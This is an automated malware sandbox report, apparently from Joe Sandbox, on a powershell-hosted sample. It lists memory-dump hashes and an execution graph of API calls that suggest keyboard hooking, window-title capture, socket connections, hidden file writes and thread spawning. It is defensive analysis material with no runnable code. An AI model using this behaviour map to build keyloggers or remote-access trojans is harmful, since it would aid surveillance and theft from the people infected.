              • Opcode Fuzzy Hash: 9f6cb60c940f89ab4d044e57ab4317cd53dddbe409f1d5b17e24473e56e1f9c7
              • Instruction Fuzzy Hash: 42D18834700304EFDF1AAF64C8547BE7BA2AFC5310F1584AAE9059B291DBB4DD49CBA1
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (:1$(:1$L4#p$L4#p$L4#p
              • API String ID: 0-1475531743
              • Opcode ID: 53a992d36f7fd679402aabc83c6bb334d068cf963cf0077e5d5626945e27b4e3
              • Instruction ID: 3801cf1cc1eff4520a6ea0106108e834af71c8f2c2a1e1d436d5b698ba851be4
              • Opcode Fuzzy Hash: 53a992d36f7fd679402aabc83c6bb334d068cf963cf0077e5d5626945e27b4e3
              • Instruction Fuzzy Hash: 8351F6B4608384EFDB1BAB2088147693FB59F47310F1A81E7D8419F1A3D7B49D88CB62
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (:1$(:1$L4#p$L4#p$L4#p
              • API String ID: 0-1475531743
              • Opcode ID: e2270523a5ea28c5d453aa64bcc10ef29c0f72bc2ba463ce076c52f7a6bb0023
              • Instruction ID: ac7e28c18b4ee930f2a1239fffcecb5fb8f3b493612a67186ef6439222182e13
              • Opcode Fuzzy Hash: e2270523a5ea28c5d453aa64bcc10ef29c0f72bc2ba463ce076c52f7a6bb0023
              • Instruction Fuzzy Hash: 4C410675604348EFDF2AAF14C8487BD7BB6AF45310F5A81E6E800AB291D7B4DD88CB51
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: L4#p$L4#p$L4#p$L:1$L:1
              • API String ID: 0-599910482
              • Opcode ID: 0a113308e9500a8b6d219565a74fca152036f4a4f1f9ede8a0e6dba397184f56
              • Instruction ID: bd7ba5f181d761c3f813fcfc3e6bb382b8f78c5d038e91580a7bf2abc4050479
              • Opcode Fuzzy Hash: 0a113308e9500a8b6d219565a74fca152036f4a4f1f9ede8a0e6dba397184f56
              • Instruction Fuzzy Hash: A341F479A00308EFDF6EAF65C4407BD77A6AF84300F1A80A5E905AB291D7B0DD89CB51
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $;1$L4#p$L4#p$L4#p
              • API String ID: 0-2145922905
              • Opcode ID: 1e38c2cdb7370f07f2ed5f28cc2c4e5bf12e378a61df07b5ad22f5dae63e0058
              • Instruction ID: a57fde9a698065c648d579bc7d99171f16c5fc52aff827307f37167ae315e503
              • Opcode Fuzzy Hash: 1e38c2cdb7370f07f2ed5f28cc2c4e5bf12e378a61df07b5ad22f5dae63e0058
              • Instruction Fuzzy Hash: 00618B34704344EFEF1BAF24C8507BE7BA6AF85300F1580A9E9419B2A2DB70DD85C791
              Memory Dump Source
              • Source File: 0000000D.00000002.463805937.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_19d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd1faae2a34aa8853549d616751d8103fada914ede98f9319c82f606ea074d65
              • Instruction ID: 6a7bb92a16d92fabe298565befad1b59a242631eaeb59da8a7b694ca7efe0437
              • Opcode Fuzzy Hash: dd1faae2a34aa8853549d616751d8103fada914ede98f9319c82f606ea074d65
              • Instruction Fuzzy Hash: 4701A271504340EAEB248E25EC84BA7BB98EF81764F2CC55AFC494F282C3799945CAB1
              Memory Dump Source
              • Source File: 0000000D.00000002.463805937.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_19d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8aa0267538ee8126d56b09bc9baaea4896060d1d63a394d0d921bf9d85209fb
              • Instruction ID: 5a3db4e9a5a1f4c65d7bcc38db105dac75e0de269e0279d7fb0ac6edbfe287e4
              • Opcode Fuzzy Hash: d8aa0267538ee8126d56b09bc9baaea4896060d1d63a394d0d921bf9d85209fb
              • Instruction Fuzzy Hash: 94F06D71504244AEEB248E16DCC8BA2FB98EB81724F18C55AED485B282C3799C45CAB1

              Execution Graph

              Execution Coverage:4.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:5.3%
              Total number of Nodes:1625
              Total number of Limit Nodes:62
48149->48150 48151 401e65 22 API calls 48150->48151 48152 414f62 48151->48152 48153 43baac _strftime 40 API calls 48152->48153 48154 414f6f 48153->48154 48155 414f81 48154->48155 48156 414f74 Sleep 48154->48156 48157 402093 28 API calls 48155->48157 48156->48155 48158 414f90 48157->48158 48159 401e65 22 API calls 48158->48159 48160 414f99 48159->48160 48161 4020f6 28 API calls 48160->48161 48162 414fa4 48161->48162 48163 41be1b 28 API calls 48162->48163 48164 414fac 48163->48164 48840 40489e WSAStartup 48164->48840 48166 414fb6 48167 401e65 22 API calls 48166->48167 48168 414fbf 48167->48168 48169 401e65 22 API calls 48168->48169 48218 41503e 48168->48218 48170 414fd8 48169->48170 48172 401e65 22 API calls 48170->48172 48171 4020f6 28 API calls 48171->48218 48173 414fe9 48172->48173 48175 401e65 22 API calls 48173->48175 48174 41be1b 28 API calls 48174->48218 48176 414ffa 48175->48176 48178 401e65 22 API calls 48176->48178 48177 406c1e 28 API calls 48177->48218 48179 41500b 48178->48179 48180 401e65 22 API calls 48179->48180 48182 41501c 48180->48182 48181 401fe2 28 API calls 48181->48218 48184 401e65 22 API calls 48182->48184 48183 401fd8 11 API calls 48183->48218 48185 41502e 48184->48185 48975 40473d 89 API calls 48185->48975 48187 40531e 28 API calls 48187->48218 48188 406383 28 API calls 48188->48218 48189 401e65 22 API calls 48189->48218 48191 41518c WSAGetLastError 48976 41cae1 30 API calls 48191->48976 48195 402093 28 API calls 48197 41519c 48195->48197 48197->48195 48199 41b4ef 80 API calls 48197->48199 48201 401e8d 11 API calls 48197->48201 48202 401e65 22 API calls 48197->48202 48203 43baac _strftime 40 API calls 48197->48203 48197->48218 48238 415a71 CreateThread 48197->48238 48239 401fd8 11 API calls 48197->48239 48240 401f09 11 API calls 48197->48240 48977 4052fd 28 API calls 48197->48977 48979 40b051 85 API calls 48197->48979 48980 404e26 99 API calls 48197->48980 48199->48197 48201->48197 48202->48197 48204 415acf Sleep 48203->48204 48204->48197 
48205 402f10 28 API calls 48205->48218 48206 402093 28 API calls 48206->48218 48207 41b4ef 80 API calls 48207->48218 48210 40905c 28 API calls 48210->48218 48211 441e81 20 API calls 48211->48218 48212 4136f8 3 API calls 48212->48218 48213 4135a6 31 API calls 48213->48218 48214 40417e 28 API calls 48214->48218 48218->48171 48218->48174 48218->48177 48218->48181 48218->48183 48218->48187 48218->48188 48218->48189 48218->48191 48218->48197 48218->48205 48218->48206 48218->48207 48218->48210 48218->48211 48218->48212 48218->48213 48218->48214 48219 41bb8e 28 API calls 48218->48219 48220 401e65 22 API calls 48218->48220 48841 414ee9 48218->48841 48846 40482d 48218->48846 48853 404f51 48218->48853 48868 4048c8 connect 48218->48868 48928 41b7e0 48218->48928 48931 4145bd 48218->48931 48934 40dd89 48218->48934 48940 41bc42 48218->48940 48943 41bd1e 48218->48943 48219->48218 48221 415439 GetTickCount 48220->48221 48222 41bb8e 28 API calls 48221->48222 48230 415456 48222->48230 48224 41bb8e 28 API calls 48224->48230 48226 41bd1e 28 API calls 48226->48230 48229 406383 28 API calls 48229->48230 48230->48224 48230->48226 48230->48229 48231 402f10 28 API calls 48230->48231 48232 402ea1 28 API calls 48230->48232 48234 401fd8 11 API calls 48230->48234 48235 401f09 11 API calls 48230->48235 48947 41bae6 48230->48947 48949 41ba96 48230->48949 48954 40f8d1 29 API calls 48230->48954 48955 402f31 28 API calls 48230->48955 48956 404c10 48230->48956 48978 404aa1 61 API calls ctype 48230->48978 48231->48230 48232->48230 48234->48230 48235->48230 48238->48197 49163 41ad17 105 API calls 48238->49163 48239->48197 48240->48197 48241->47415 48242->47422 48243->47426 48246 4020df 11 API calls 48245->48246 48247 406c2a 48246->48247 48248 4032a0 28 API calls 48247->48248 48249 406c47 48248->48249 48249->47448 48251 413573 RegQueryValueExA RegCloseKey 48250->48251 48252 40eba4 48250->48252 48251->48252 48252->47445 48252->47463 48253->47451 48254->47481 48255->47475 48256->47465 48257->47479 48259 
401f86 11 API calls 48258->48259 48260 40da50 48259->48260 48261 40da70 48260->48261 48262 40daa5 48260->48262 48277 40da66 48260->48277 49164 41b5b4 29 API calls 48261->49164 48264 41bfb7 GetCurrentProcess 48262->48264 48263 40db99 GetLongPathNameW 48266 40417e 28 API calls 48263->48266 48267 40daaa 48264->48267 48269 40dbae 48266->48269 48270 40db00 48267->48270 48271 40daae 48267->48271 48268 40da79 48272 401f13 28 API calls 48268->48272 48273 40417e 28 API calls 48269->48273 48274 40417e 28 API calls 48270->48274 48275 40417e 28 API calls 48271->48275 48276 40da83 48272->48276 48278 40dbbd 48273->48278 48279 40db0e 48274->48279 48280 40dabc 48275->48280 48281 401f09 11 API calls 48276->48281 48277->48263 49167 40ddd1 28 API calls 48278->49167 48285 40417e 28 API calls 48279->48285 48286 40417e 28 API calls 48280->48286 48281->48277 48283 40dbd0 49168 402fa5 28 API calls 48283->49168 48288 40db24 48285->48288 48289 40dad2 48286->48289 48287 40dbdb 49169 402fa5 28 API calls 48287->49169 49166 402fa5 28 API calls 48288->49166 49165 402fa5 28 API calls 48289->49165 48293 40dbe5 48297 401f09 11 API calls 48293->48297 48294 40db2f 48298 401f13 28 API calls 48294->48298 48295 40dadd 48296 401f13 28 API calls 48295->48296 48300 40dae8 48296->48300 48301 40dbef 48297->48301 48299 40db3a 48298->48299 48302 401f09 11 API calls 48299->48302 48303 401f09 11 API calls 48300->48303 48304 401f09 11 API calls 48301->48304 48306 40db43 48302->48306 48307 40daf1 48303->48307 48305 40dbf8 48304->48305 48308 401f09 11 API calls 48305->48308 48309 401f09 11 API calls 48306->48309 48310 401f09 11 API calls 48307->48310 48311 40dc01 48308->48311 48309->48276 48310->48276 48312 401f09 11 API calls 48311->48312 48313 40dc0a 48312->48313 48314 401f09 11 API calls 48313->48314 48315 40dc13 48314->48315 48315->47539 48316->47551 48317->47573 48319 41371e RegQueryValueExA RegCloseKey 48318->48319 48320 413742 48318->48320 48319->48320 48320->47529 48321->47565 48326 4344ef 48322->48326 
48323 43bd51 _Yarn 21 API calls 48323->48326 48324 40f0d1 48324->47604 48326->48323 48326->48324 49170 442f80 7 API calls 2 library calls 48326->49170 49171 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48326->49171 49172 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48326->49172 48329->47635 48330->47623 48332->47667 48333->47470 48336 41b4c5 LoadResource LockResource SizeofResource 48335->48336 48337 40f3de 48335->48337 48336->48337 48338 43bd51 48337->48338 48343 446137 ___crtLCMapStringA 48338->48343 48339 446175 48355 4405dd 20 API calls __dosmaperr 48339->48355 48340 446160 RtlAllocateHeap 48342 446173 48340->48342 48340->48343 48342->47923 48343->48339 48343->48340 48354 442f80 7 API calls 2 library calls 48343->48354 48346 4020bf 48345->48346 48356 4023ce 48346->48356 48348 4020ca 48360 40250a 48348->48360 48350 4020d9 48350->47926 48352 4020b7 28 API calls 48351->48352 48353 406dec 48352->48353 48353->47933 48354->48343 48355->48342 48357 4023d8 48356->48357 48358 402428 48356->48358 48357->48358 48367 4027a7 11 API calls std::_Deallocate 48357->48367 48358->48348 48361 40251a 48360->48361 48362 402520 48361->48362 48363 402535 48361->48363 48368 402569 48362->48368 48378 4028e8 48363->48378 48366 402533 48366->48350 48367->48358 48369 402888 22 API calls 48368->48369 48370 40257d 48369->48370 48371 402592 48370->48371 48372 4025a7 48370->48372 48389 402a34 22 API calls 48371->48389 48374 4028e8 28 API calls 48372->48374 48377 4025a5 48374->48377 48375 40259b 48390 4029da 22 API calls 48375->48390 48377->48366 48379 4028f1 48378->48379 48380 402953 48379->48380 48381 4028fb 48379->48381 48397 4028a4 22 API calls 48380->48397 48384 402904 48381->48384 48385 402917 48381->48385 48391 402cae 48384->48391 48387 402915 48385->48387 48388 4023ce 11 API calls 48385->48388 48387->48366 48388->48387 48389->48375 48390->48377 48392 402cb8 __EH_prolog 48391->48392 48398 402e54 22 API calls 48392->48398 
48394 4023ce 11 API calls 48396 402d92 48394->48396 48395 402d24 48395->48394 48396->48387 48398->48395 48400 4020e7 48399->48400 48401 4023ce 11 API calls 48400->48401 48402 4020f2 48401->48402 48402->47955 48408 40423a 48403->48408 48406->47955 48407->47961 48409 404243 48408->48409 48410 4023ce 11 API calls 48409->48410 48411 40424e 48410->48411 48412 402569 28 API calls 48411->48412 48413 4041b5 48412->48413 48413->47955 48414->47965 48415->47970 48416->47968 48420 4032aa 48418->48420 48419 4032c9 48419->47981 48420->48419 48421 4028e8 28 API calls 48420->48421 48421->48419 48423 4051fb 48422->48423 48432 405274 48423->48432 48425 405208 48425->47984 48427 402061 48426->48427 48428 4023ce 11 API calls 48427->48428 48429 40207b 48428->48429 48454 40267a 48429->48454 48433 405282 48432->48433 48434 405288 48433->48434 48435 40529e 48433->48435 48443 4025f0 48434->48443 48437 4052f5 48435->48437 48438 4052b6 48435->48438 48452 4028a4 22 API calls 48437->48452 48441 4028e8 28 API calls 48438->48441 48442 40529c 48438->48442 48441->48442 48442->48425 48444 402888 22 API calls 48443->48444 48445 402602 48444->48445 48446 402672 48445->48446 48448 402629 48445->48448 48453 4028a4 22 API calls 48446->48453 48450 4028e8 28 API calls 48448->48450 48451 40263b 48448->48451 48450->48451 48451->48442 48455 40268b 48454->48455 48456 4023ce 11 API calls 48455->48456 48457 40208d 48456->48457 48457->47987 48458->47995 48459->48000 48462 41bfc4 GetCurrentProcess 48461->48462 48463 41b2d1 48461->48463 48462->48463 48464 4135a6 RegOpenKeyExA 48463->48464 48465 4135d4 RegQueryValueExA RegCloseKey 48464->48465 48466 4135fe 48464->48466 48465->48466 48467 402093 28 API calls 48466->48467 48468 413613 48467->48468 48468->48011 48469->48022 48471 40b90c 48470->48471 48472 402252 11 API calls 48471->48472 48473 40b917 48472->48473 48476 40b92c 48473->48476 48475 40b926 48475->48030 48477 40b966 48476->48477 48478 40b938 48476->48478 48483 4028a4 22 API calls 48477->48483 48479 4027e6 
28 API calls 48478->48479 48482 40b942 48479->48482 48482->48475 48484->48033 48486 402347 48485->48486 48487 402252 11 API calls 48486->48487 48488 4023c7 48487->48488 48488->48033 48490 4024f9 48489->48490 48491 40250a 28 API calls 48490->48491 48492 4020b1 48491->48492 48492->47545 48509 43ba0a 48493->48509 48495 43ae50 48496 43a7b7 __cftoe 36 API calls 48495->48496 48501 43ae5c 48496->48501 48497 43ae15 48497->48495 48498 43ae2a 48497->48498 48508 43ae2f __wsopen_s 48497->48508 48514 4405dd 20 API calls __dosmaperr 48498->48514 48502 43ae8b 48501->48502 48515 43ba4f 40 API calls __Tolower 48501->48515 48505 43aef7 48502->48505 48516 43b9b6 20 API calls 2 library calls 48502->48516 48517 43b9b6 20 API calls 2 library calls 48505->48517 48506 43afbe _strftime 48506->48508 48518 4405dd 20 API calls __dosmaperr 48506->48518 48508->48068 48510 43ba22 48509->48510 48511 43ba0f 48509->48511 48510->48497 48519 4405dd 20 API calls __dosmaperr 48511->48519 48513 43ba14 __wsopen_s 48513->48497 48514->48508 48515->48501 48516->48505 48517->48506 48518->48508 48519->48513 48526 401fb0 48520->48526 48522 402f1e 48523 402055 11 API calls 48522->48523 48524 402f2d 48523->48524 48524->48082 48525->48085 48527 4025f0 28 API calls 48526->48527 48528 401fbd 48527->48528 48528->48522 48530 40a127 48529->48530 48531 413549 3 API calls 48530->48531 48532 40a12e 48531->48532 48533 40a142 48532->48533 48534 40a15c 48532->48534 48535 409e9b 48533->48535 48536 40a147 48533->48536 48550 40905c 48534->48550 48535->47596 48538 40905c 28 API calls 48536->48538 48540 40a155 48538->48540 48578 40a22d 29 API calls 48540->48578 48543 40a15a 48543->48535 48544->48111 48713 403222 48545->48713 48547 403022 48717 403262 48547->48717 48551 409072 48550->48551 48552 402252 11 API calls 48551->48552 48553 40908c 48552->48553 48554 404267 28 API calls 48553->48554 48555 40909a 48554->48555 48556 40a179 48555->48556 48579 40b8ec 48556->48579 48559 40a1a2 48562 402093 28 API calls 48559->48562 48560 
40a1ca 48561 402093 28 API calls 48560->48561 48564 40a1d5 48561->48564 48563 40a1ac 48562->48563 48565 41bc5e 28 API calls 48563->48565 48566 402093 28 API calls 48564->48566 48567 40a1ba 48565->48567 48568 40a1e4 48566->48568 48583 40b164 31 API calls _Yarn 48567->48583 48570 41b4ef 80 API calls 48568->48570 48572 40a1e9 CreateThread 48570->48572 48571 40a1c1 48573 401fd8 11 API calls 48571->48573 48574 40a210 CreateThread 48572->48574 48575 40a204 CreateThread 48572->48575 48591 40a27d 48572->48591 48573->48560 48576 401f09 11 API calls 48574->48576 48588 40a289 48574->48588 48575->48574 48585 40a267 48575->48585 48577 40a224 48576->48577 48577->48535 48578->48543 48712 40a273 164 API calls 48578->48712 48580 40b8f5 48579->48580 48581 40a197 48579->48581 48584 40b96c 28 API calls 48580->48584 48581->48559 48581->48560 48583->48571 48584->48581 48594 40a2b8 48585->48594 48624 40acd6 48588->48624 48665 40a726 48591->48665 48595 40a2d1 GetModuleHandleA SetWindowsHookExA 48594->48595 48596 40a333 GetMessageA 48594->48596 48595->48596 48598 40a2ed GetLastError 48595->48598 48597 40a345 TranslateMessage DispatchMessageA 48596->48597 48608 40a270 48596->48608 48597->48596 48597->48608 48609 41bb8e 48598->48609 48615 441e81 48609->48615 48612 402093 28 API calls 48613 40a2fe 48612->48613 48614 4052fd 28 API calls 48613->48614 48616 441e8d 48615->48616 48619 441c7d 48616->48619 48618 41bbb2 48618->48612 48620 441c94 48619->48620 48622 441ccb __wsopen_s 48620->48622 48623 4405dd 20 API calls __dosmaperr 48620->48623 48622->48618 48623->48622 48629 40ace4 48624->48629 48625 40a292 48626 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW WSAGetQOSByName 48626->48629 48629->48625 48629->48626 48631 40ad84 GetWindowTextW 48629->48631 48634 40b8ec 28 API calls 48629->48634 48635 40aedc 48629->48635 48636 41bae6 GetTickCount 48629->48636 48638 40ae49 Sleep 48629->48638 48639 441e81 20 API calls 48629->48639 48641 402093 28 API calls 48629->48641 48642 40add1 48629->48642 
48646 406383 28 API calls 48629->48646 48648 403014 28 API calls 48629->48648 48649 41bc5e 28 API calls 48629->48649 48650 401f09 11 API calls 48629->48650 48651 40a636 12 API calls 48629->48651 48652 401fd8 11 API calls 48629->48652 48653 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48629->48653 48654 401f86 48629->48654 48658 434770 23 API calls __onexit 48629->48658 48659 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48629->48659 48660 409044 28 API calls 48629->48660 48662 40b97c 28 API calls 48629->48662 48663 40b748 40 API calls 2 library calls 48629->48663 48664 4052fd 28 API calls 48629->48664 48631->48629 48634->48629 48637 401f09 11 API calls 48635->48637 48636->48629 48637->48625 48638->48629 48639->48629 48641->48629 48642->48629 48644 40905c 28 API calls 48642->48644 48661 40b164 31 API calls _Yarn 48642->48661 48644->48642 48646->48629 48648->48629 48649->48629 48650->48629 48651->48629 48652->48629 48655 401f8e 48654->48655 48656 402252 11 API calls 48655->48656 48657 401f99 48656->48657 48657->48629 48658->48629 48659->48629 48660->48629 48661->48642 48662->48629 48663->48629 48666 40a73b Sleep 48665->48666 48686 40a675 48666->48686 48668 40a286 48669 40a77b CreateDirectoryW 48673 40a74d 48669->48673 48670 40a78c GetFileAttributesW 48670->48673 48671 40a7a3 SetFileAttributesW 48671->48673 48673->48666 48673->48668 48673->48670 48673->48671 48675 401e65 22 API calls 48673->48675 48684 40a76f 48673->48684 48699 41c3f1 48673->48699 48674 40a81d PathFileExistsW 48674->48684 48675->48673 48676 4020df 11 API calls 48676->48684 48677 4020b7 28 API calls 48677->48684 48679 40a926 SetFileAttributesW 48679->48673 48680 406dd8 28 API calls 48680->48684 48681 401fe2 28 API calls 48681->48684 48682 401fd8 11 API calls 48682->48684 48684->48669 48684->48674 48684->48676 48684->48677 48684->48679 48684->48680 48684->48681 48684->48682 48685 401fd8 11 API calls 48684->48685 48709 
41c485 32 API calls 48684->48709 48710 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48684->48710 48685->48673 48687 40a722 48686->48687 48689 40a68b 48686->48689 48687->48673 48688 40a6aa CreateFileW 48688->48689 48690 40a6b8 GetFileSize 48688->48690 48689->48688 48691 40a6ed CloseHandle 48689->48691 48692 40a6ff 48689->48692 48693 40a6e2 Sleep 48689->48693 48694 40a6db 48689->48694 48690->48689 48690->48691 48691->48689 48692->48687 48696 40905c 28 API calls 48692->48696 48693->48691 48711 40b0dc 84 API calls 48694->48711 48697 40a71b 48696->48697 48698 40a179 125 API calls 48697->48698 48698->48687 48700 41c404 CreateFileW 48699->48700 48702 41c441 48700->48702 48703 41c43d 48700->48703 48704 41c461 WriteFile 48702->48704 48705 41c448 SetFilePointer 48702->48705 48703->48673 48707 41c474 48704->48707 48708 41c476 CloseHandle 48704->48708 48705->48704 48706 41c458 CloseHandle 48705->48706 48706->48703 48707->48708 48708->48703 48709->48684 48710->48684 48711->48693 48714 40322e 48713->48714 48723 403618 48714->48723 48716 40323b 48716->48547 48718 40326e 48717->48718 48719 402252 11 API calls 48718->48719 48720 403288 48719->48720 48721 402336 11 API calls 48720->48721 48722 403031 48721->48722 48722->48115 48724 403626 48723->48724 48725 403644 48724->48725 48726 40362c 48724->48726 48728 40369e 48725->48728 48730 40365c 48725->48730 48734 4036a6 28 API calls 48726->48734 48735 4028a4 22 API calls 48728->48735 48732 4027e6 28 API calls 48730->48732 48733 403642 48730->48733 48732->48733 48733->48716 48734->48733 48741 404353 48736->48741 48738 40430a 48739 403262 11 API calls 48738->48739 48740 404319 48739->48740 48740->48124 48742 40435f 48741->48742 48745 404371 48742->48745 48744 40436d 48744->48738 48746 40437f 48745->48746 48747 404385 48746->48747 48748 40439e 48746->48748 48811 4034e6 28 API calls 48747->48811 48749 402888 22 API calls 48748->48749 48750 4043a6 48749->48750 48752 404419 48750->48752 48753 4043bf 48750->48753 48812 
4028a4 22 API calls 48752->48812 48756 4027e6 28 API calls 48753->48756 48764 40439c 48753->48764 48756->48764 48764->48744 48811->48764 48819 43aa9a 48813->48819 48817 4138b9 48816->48817 48818 41388f RegSetValueExA RegCloseKey 48816->48818 48817->48140 48818->48817 48822 43aa1b 48819->48822 48821 40170d 48821->48142 48823 43aa2a 48822->48823 48824 43aa3e 48822->48824 48835 4405dd 20 API calls __dosmaperr 48823->48835 48827 43aa2f __alldvrm __wsopen_s 48824->48827 48828 448957 48824->48828 48827->48821 48829 4484ca __Toupper 5 API calls 48828->48829 48830 44897e 48829->48830 48831 448996 GetSystemTimeAsFileTime 48830->48831 48832 44898a 48830->48832 48831->48832 48833 434fcb CatchGuardHandler 5 API calls 48832->48833 48834 4489a7 48833->48834 48834->48827 48835->48827 48839 41b8f9 ctype ___scrt_fastfail 48836->48839 48837 402093 28 API calls 48838 414f49 48837->48838 48838->48149 48839->48837 48840->48166 48842 414f02 getaddrinfo WSASetLastError 48841->48842 48843 414ef8 48841->48843 48842->48218 48981 414d86 48843->48981 48847 404846 socket 48846->48847 48848 404839 48846->48848 48849 404860 CreateEventW 48847->48849 48850 404842 48847->48850 49020 40489e WSAStartup 48848->49020 48849->48218 48850->48218 48852 40483e 48852->48847 48852->48850 48854 404f65 48853->48854 48855 404fea 48853->48855 48856 404f6e 48854->48856 48857 404fc0 CreateEventA CreateThread 48854->48857 48858 404f7d GetLocalTime 48854->48858 48855->48218 48856->48857 48857->48855 49022 405150 48857->49022 48859 41bb8e 28 API calls 48858->48859 48860 404f91 48859->48860 49021 4052fd 28 API calls 48860->49021 48869 404a1b 48868->48869 48870 4048ee 48868->48870 48871 40497e 48869->48871 48872 404a21 WSAGetLastError 48869->48872 48870->48871 48873 404923 48870->48873 48875 40531e 28 API calls 48870->48875 48871->48218 48872->48871 48874 404a31 48872->48874 49026 420c60 27 API calls 48873->49026 48876 404932 48874->48876 48877 404a36 48874->48877 48880 40490f 48875->48880 48883 402093 28 API calls 
48876->48883 49031 41cae1 30 API calls 48877->49031 48879 40492b 48879->48876 48882 404941 48879->48882 48884 402093 28 API calls 48880->48884 48892 404950 48882->48892 48893 404987 48882->48893 48886 404a80 48883->48886 48887 40491e 48884->48887 48885 404a40 49032 4052fd 28 API calls 48885->49032 48889 402093 28 API calls 48886->48889 48890 41b4ef 80 API calls 48887->48890 48894 404a8f 48889->48894 48890->48873 48898 402093 28 API calls 48892->48898 49028 421a40 54 API calls 48893->49028 48899 41b4ef 80 API calls 48894->48899 48902 40495f 48898->48902 48899->48871 48900 40498f 48903 4049c4 48900->48903 48904 404994 48900->48904 48906 402093 28 API calls 48902->48906 49030 420e06 28 API calls 48903->49030 48907 402093 28 API calls 48904->48907 48909 40496e 48906->48909 48911 4049a3 48907->48911 48912 41b4ef 80 API calls 48909->48912 48914 402093 28 API calls 48911->48914 48915 404973 48912->48915 48913 4049cc 48916 4049f9 CreateEventW CreateEventW 48913->48916 48918 402093 28 API calls 48913->48918 48917 4049b2 48914->48917 49027 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48915->49027 48916->48871 48920 41b4ef 80 API calls 48917->48920 48919 4049e2 48918->48919 48922 402093 28 API calls 48919->48922 48923 4049b7 48920->48923 48924 4049f1 48922->48924 49029 4210b2 52 API calls 48923->49029 48926 41b4ef 80 API calls 48924->48926 48927 4049f6 48926->48927 48927->48916 49033 41b7b6 GlobalMemoryStatusEx 48928->49033 48930 41b7f5 48930->48218 49034 414580 48931->49034 48935 40dda5 48934->48935 48936 4134ff 3 API calls 48935->48936 48937 40ddac 48936->48937 48938 40ddc4 48937->48938 48939 413549 3 API calls 48937->48939 48938->48218 48939->48938 48941 4020b7 28 API calls 48940->48941 48942 41bc57 48941->48942 48942->48218 48944 41bd2b 48943->48944 48945 4020b7 28 API calls 48944->48945 48946 41bd3d 48945->48946 48946->48218 48948 41bafc GetTickCount 48947->48948 48948->48230 48950 436e90 ___scrt_fastfail 48949->48950 48951 41bab5 
GetForegroundWindow GetWindowTextW 48950->48951 48952 40417e 28 API calls 48951->48952 48953 41badf 48952->48953 48953->48230 48954->48230 48955->48230 48957 4020df 11 API calls 48956->48957 48958 404c27 48957->48958 48959 4020df 11 API calls 48958->48959 48971 404c30 48959->48971 48960 43bd51 _Yarn 21 API calls 48960->48971 48962 404c96 48964 404ca1 48962->48964 48962->48971 48963 4020b7 28 API calls 48963->48971 49076 404e26 99 API calls 48964->49076 48965 401fe2 28 API calls 48965->48971 48967 404ca8 48969 401fd8 11 API calls 48967->48969 48968 401fd8 11 API calls 48968->48971 48970 404cb1 48969->48970 48972 401fd8 11 API calls 48970->48972 48971->48960 48971->48962 48971->48963 48971->48965 48971->48968 49063 404cc3 48971->49063 49075 404b96 57 API calls 48971->49075 48973 404cba 48972->48973 48973->48197 48975->48218 48976->48197 48978->48230 48979->48197 48980->48197 48982 414dc8 GetSystemDirectoryA 48981->48982 48999 414ecf 48981->48999 48983 414de3 48982->48983 48982->48999 49002 441a3e 48983->49002 48985 414dff 49009 441a98 48985->49009 48987 414e0f LoadLibraryA 48988 414e31 GetProcAddress 48987->48988 48989 414e42 48987->48989 48988->48989 48990 414e3d FreeLibrary 48988->48990 48991 441a3e ___std_exception_copy 20 API calls 48989->48991 49000 414e93 48989->49000 48990->48989 48992 414e5e 48991->48992 48993 441a98 20 API calls 48992->48993 48995 414e6e LoadLibraryA 48993->48995 48994 414e99 GetProcAddress 48996 414eb4 FreeLibrary 48994->48996 48994->49000 48998 414e82 GetProcAddress 48995->48998 48995->48999 48997 414eb2 48996->48997 48997->48999 48998->49000 49001 414e8e FreeLibrary 48998->49001 48999->48842 49000->48994 49000->48997 49000->48999 49001->49000 49003 441a59 49002->49003 49004 441a4b 49002->49004 49016 4405dd 20 API calls __dosmaperr 49003->49016 49004->49003 49007 441a70 49004->49007 49006 441a61 __wsopen_s 49006->48985 49007->49006 49017 4405dd 20 API calls __dosmaperr 49007->49017 49010 441ab4 49009->49010 49012 441aa6 49009->49012 49018 
